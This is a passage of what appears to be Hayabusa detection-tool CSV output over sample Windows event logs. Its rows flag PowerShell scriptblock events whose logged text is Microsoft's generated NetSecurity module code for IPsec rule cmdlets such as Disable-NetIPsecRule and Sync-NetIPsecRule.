[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 